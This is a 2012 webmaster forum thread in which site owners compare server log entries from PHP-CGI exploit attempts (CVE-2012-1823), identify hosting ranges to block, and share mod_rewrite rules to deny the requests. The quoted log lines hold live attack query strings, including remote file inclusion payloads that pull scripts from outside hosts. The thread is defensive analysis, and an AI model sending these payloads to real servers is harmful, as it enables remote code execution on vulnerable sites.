homepage Welcome to WebmasterWorld Guest from 54.196.196.62
register, free tools, login, search, subscribe, help, library, announcements, recent posts, open posts,
Subscribe to WebmasterWorld

Home / Forums Index / Search Engines / Search Engine Spider and User Agent Identification
Forum Library, Charter, Moderators: Ocean10000 & incrediBILL

Search Engine Spider and User Agent Identification Forum

    
what is this POST command and why did it get a 200?
dupres01




msg:4456439
 2:37 pm on May 22, 2012 (gmt 0)

The following showed up in my log. I have no idea what it is doing. Also, this is the only entry in the log for IP 173.73.115.178.

173.73.115.178 - - [22/May/2012:02:58:02 -0600] "POST /?-dallow_url_include%3don+-dauto_prepend_file%3dphp://input HTTP/1.1" 200 6835 "-" "Mozilla/3.0 (windows)"

The IP hasn't accessed anything on my site so I don't even know what it is posting in response to.
It looks to me as if it is trying to do something destructive, but I am only guessing.

(I am unsure which forum topic this question belongs in.)

 

dstiles




msg:4456606
 8:58 pm on May 22, 2012 (gmt 0)

That specific IP had a go at my server a couple of days ago. It got rejected but tried 3 times in all.

All three hits were with the UA...
Mozilla/3.0 (windows)
...same as a hit 15 minutes earlier from an AT&T IP (also blocked) and probably others.

I don't log POSTs in my security logs (they can be far too long!). The QUERYSTRING is the same though, but only on the second and third hits, not the first, which was probably just establishing contact.

I would guess it was trying to add something nsty into a php file on the site. Whether it could succeed depends on how you handle such things - or even whether your site is php in the first place. :)

dupres01




msg:4456676
 11:08 pm on May 22, 2012 (gmt 0)

Dstiles: thanks for the reply. I blocked that IP as soon as I saw the log reference.
Is there any way I can determine which php file was involved (short of examining every one of them)?

lucy24




msg:4456687
 11:22 pm on May 22, 2012 (gmt 0)

From the topic header:
why did it get a 200

Was it supposed to get a 403? I've had similar headscratchers, and they tend to come down to UA rewrites. For example, if a nasty robot pretends to be MSIE 5, it will get rewritten to a special page. So it may never meet the later rules that would have kicked in if a normal UA had made the same request.

There are other possible explanations, but they all come down to: Even though logs say 200, your visiting nasty didn't actually get what it wanted.

g1smd




msg:4456691
 11:29 pm on May 22, 2012 (gmt 0)

The /?- start suggests that the root index file was involved.

keyplyr




msg:4456701
 11:55 pm on May 22, 2012 (gmt 0)


dupres01 - I would FTP to your account and have a look at files on your server, in particular the PHP folder to see if there have been any new files added. Also you might take a look at the HTML of your online index page and a couple of the other landing pages for any added code, usually at the top or the very bottom.

wilderness




msg:4456707
 12:05 am on May 23, 2012 (gmt 0)

Had the same request two days ago:

173.73.115.178 - - [20/May/2012:22:53:37 +0100] "POST /?-dallow_url_include%3don+-dauto_prepend_file%3dphp://input HTTP/1.1" 403 533 "-" "Mozilla/3.0 (windows)"

was denied based upon incorrect case or syntax on "Windows"

g1smd




msg:4456714
 12:13 am on May 23, 2012 (gmt 0)

I see that I bounced it purely on the use of underscores in the URL request.

I never use underscores in URLs. This ruling also has the handy effect of blocking direct access to PHP include files as their file names often do have underscores.

If that rule hadn't been there, then the combination of POST and "php" in the URL would have kicked it to the kerb anyway.

wilderness




msg:4456734
 1:15 am on May 23, 2012 (gmt 0)

I never use underscores in URLs.


Don't recall that I ever have either, although I used one on Saturday for a temp-file-trivia.

What syntax do you use for the denial?

keyplyr




msg:4456740
 1:21 am on May 23, 2012 (gmt 0)

I block "prepend" and "append" anywhere from incoming requests, although I do it myself on the server.

g1smd




msg:4456744
 1:36 am on May 23, 2012 (gmt 0)

Block requests with underscore in path:
RewriteRule _ - [F]

I redirect requests with parameters over to extensionless URLs. The RegEx patterns that capture the parameter values usually allow only lower case letters, numbers and hyphens. Everything else will lead to a 404 error at the very least.

SteveWh




msg:4456861
 8:42 am on May 23, 2012 (gmt 0)

That looks like an attempt to exploit the vulnerability in some PHP-as-CGI setups, which was discussed here and elsewhere a couple of weeks ago.

[php.net...]

It tries to use the PHP -d flag to set two php.ini entries.

The request got a 200 response because it was basically just a request for your home page, with the maliciously-intentioned query string added.

grandma genie




msg:4457174
 2:09 am on May 24, 2012 (gmt 0)

I have also gotten a similar type of log entry.

177.8.168.n - - "POST //?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input+-d+safe_mode%3d1+-d+suhosin.simulation%3d1+-d+disable_functions%3d%22%22+-d+open_basedir%3dnone+-n HTTP/1.1" 302 - "-" "-"

And just now I found an entry that seems in some odd way connected. This visitor has sucuri.net as its initial referer (although that could be bogus). But the IP is coming from linode. And the UAs are bogus. Here are some samples:

97.107.135.nnn - - "GET / HTTP/1.1" 302 - "http://www.google.com/images/url" "googlebot"
97.107.135.nnn - - "GET /example HTTP/1.1" 301 249 "http://www.google.com/images/url" "googlebot"
97.107.135.nnn - - "GET /example/ HTTP/1.1" 200 22302 "http://www.google.com/images/url" "googlebot"
97.107.135.nnn - - "GET / HTTP/1.1" 302 - "http://sucuri.net" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 MSIE 7.0"
97.107.135.nnn - - "GET /example/php file HTTP/1.1" 302 198 "-" "Ipad Iphone Safari"
97.107.135.nnn - - "GET /example/php file HTTP/1.1" 302 - "h**p://www.bing.com/?s=bin" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 MSIE 7.0"

Just seemed odd that this visitor would go from a site about website security and malware to my ecommerce site that had recently seen an attempted exploit and then attempted its own exploit. Like it was doing some testing. Not sure if there is any connection at all, but just thought I would throw it out for your info.

By the way, the 302 redirects are happening, I believe, because my index.php file is a redirect.

wilderness




msg:4457201
 3:44 am on May 24, 2012 (gmt 0)

gg,

Two things with so-called visitor from 97.107.135.nnn:
1) why on earth are you allowing visitors with "fake google UA's" (especially this malformed one?

2) Linode is a server farm:
97.107.128.0 - 97.107.143.255

blend27




msg:4457330
 12:01 pm on May 24, 2012 (gmt 0)

OT: More ranges on LINODE server farm.

LINODE-US (NET6-2600-3C00-1) 2600:3C00:: - 2600:3C03:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF
LINODE-US (NET-173-230-128-0-1) 173.230.128.0 - 173.230.159.255
LINODE-US (NET-173-255-192-0-1) 173.255.192.0 - 173.255.255.255
LINODE-US (NET-50-116-0-0-1) 50.116.0.0 - 50.116.63.255
LINODE-US (NET-66-228-32-0-1) 66.228.32.0 - 66.228.63.255
LINODE-US (NET-69-164-192-0-1) 69.164.192.0 - 69.164.223.255
LINODE-US (NET-72-14-176-0-1) 72.14.176.0 - 72.14.191.255
LINODE-US (NET-74-207-224-0-1) 74.207.224.0 - 74.207.255.255
LINODE-US (NET-96-126-96-0-1) 96.126.96.0 - 96.126.127.255
LINODE-US (NET-97-107-128-0-1) 97.107.128.0 - 97.107.143.255

dstiles




msg:4457570
 9:17 pm on May 24, 2012 (gmt 0)

I have a couple of extras on that list...

50.116.0.0 - 50.116.63.255
66.228.32.0 - 66.228.63.255
69.164.192.0 - 69.164.223.255
72.14.176.0 - 72.14.191.255
74.207.224.0 - 74.207.255.255
96.126.96.0 - 96.126.127.255
97.107.128.0 - 97.107.143.255
109.74.192.0 - 109.74.207.255 (UK)
173.230.128.0 - 173.230.159.255
173.255.192.0 - 173.255.255.255
178.79.128.0 - 178.79.191.255

blend27




msg:4457763
 11:34 am on May 25, 2012 (gmt 0)

2012-05-24 19:17:11 GET /index.php -dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt 80 - 108.49.215.253 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0b;+Windows+NT+5.0;+.NET+CLR+1.0.2914)

108.49.215.253(Verizon Online LLC) trying to inject info3.txt from 81.17.24.82(privatelayer.com.pa - server farm)

dstiles




msg:4457934
 8:18 pm on May 25, 2012 (gmt 0)

81.17.24.82 - not just any server farm. Although only blocked by me in January this year my notes say "listed in uce-protect Level 2 as banned (ie for spam) - robtex claims RU, DNS claims CH and registration address is PA (Panama)". There is no rDNS for the specific IP, unusual for a server farm.

I have the complete 81.17.16.0/20 blocked for the above reasons. It looks very dodgy to me.

Verizon is such a large range (108.0.0.0-108.57.255.255) that anything could happen there - and frequently does. Haven't had so many this year but last year over 50 IPs blocked within that range, some for multiple offences. In all I have blocked around 450 verizon IPs over the past couple of years. Not as bad as Comcast (990) but still nasty.

grandma genie




msg:4470781
 6:19 am on Jun 29, 2012 (gmt 0)

Just as a little follow-up, here is a sampling of log entries of a similar nature. This is just for your information.

74.55.62.nn - - [03/Jun/2012:13:48:36 -0400] "POST /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://84.20.17.nnn/sites/api.gif%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://84.20.17.nnn/sites/api.gif%20-n HTTP/1.1" 403 - "-" "Mozilla/5.0"

91.224.160.nnn - - [03/Jun/2012:23:37:41 -0400] "POST /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1" 403 - "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; de) Opera 11.51"

85.92.83.nnn - - [05/Jun/2012:10:45:05 -0400] "POST /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://109.68.72.nn/icons/api.gif%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://109.68.72.nn/icons/api.gif%20-n HTTP/1.1" 403 - "-" "Mozilla/5.0"

190.60.44.nnn - - [19/Jun/2012:19:54:26 -0400] "GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://64.109.183.nn/bin/acesso.txt%20-n HTTP/1.1" 403 - "-" "libwww-perl/5.803"

213.190.161.nnn - - [23/Jun/2012:12:00:39 -0400] "GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://64.109.183.nn/bin/acesso.txt%20-n HTTP/1.1" 403 - "-" "libwww-perl/5.805"

200.62.177.nn - - [25/Jun/2012:12:55:27 -0400] "GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://64.109.183.nn/bin/id.txt%20-n HTTP/1.1" 403 - "-" "Mozilla/5.0"

70.84.108.nn - - [25/Jun/2012:17:00:29 -0400] "GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://64.109.183.nn/bin/acesso.txt%20-n HTTP/1.1" 403 - "-" "libwww-perl/6.04"

MxAngel




msg:4471119
 11:49 pm on Jun 29, 2012 (gmt 0)

It has been going on for a while. They are after the latest PHP-CGI remote code execution bug (CVE-2012-1823).

[stopmalvertising.com...]

When PHP is used in a CGI wrapper, remote attackers may use command-line switches, such as -s, -d or -c, in a query string that will be passed to the PHP-CGI binary, leading to arbitrary code execution or source code disclosure.


[eindbazen.net...]

If you are vulnerable the following directive might help:

RewriteEngine On
RewriteCond %{QUERY_STRING} ^(%2d|\-)[^=]+$ [NC]
RewriteRule (.*) - [F,L]

Most of them will try a RFI (Remote File Inclusion) which is a shell most of the time.

g1smd




msg:4471121
 11:54 pm on Jun 29, 2012 (gmt 0)

Couple of quick fixes:

RewriteCond %{QUERY_STRING} ^(%2d|-)[^=]+
RewriteRule .* - [F]

blend27




msg:4471272
 1:44 pm on Jun 30, 2012 (gmt 0)

2012-06-30 GET /index.php -dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.83%2Finfo3.txt 80 - 83.155.50.106 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0b;+Windows+NT+5.0;+.NET+CLR+1.0.2914)

Note that IP its pointing to is UP by one from my prev post on this. This is from a different site than the prev one.

Global Options:
 top home search open messages active posts  
 

Home / Forums Index / Search Engines / Search Engine Spider and User Agent Identification
rss feed

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
Home ¦ Free Tools ¦ Terms of Service ¦ Privacy Policy ¦ Report Problem ¦ About ¦ Library ¦ Newsletter
WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved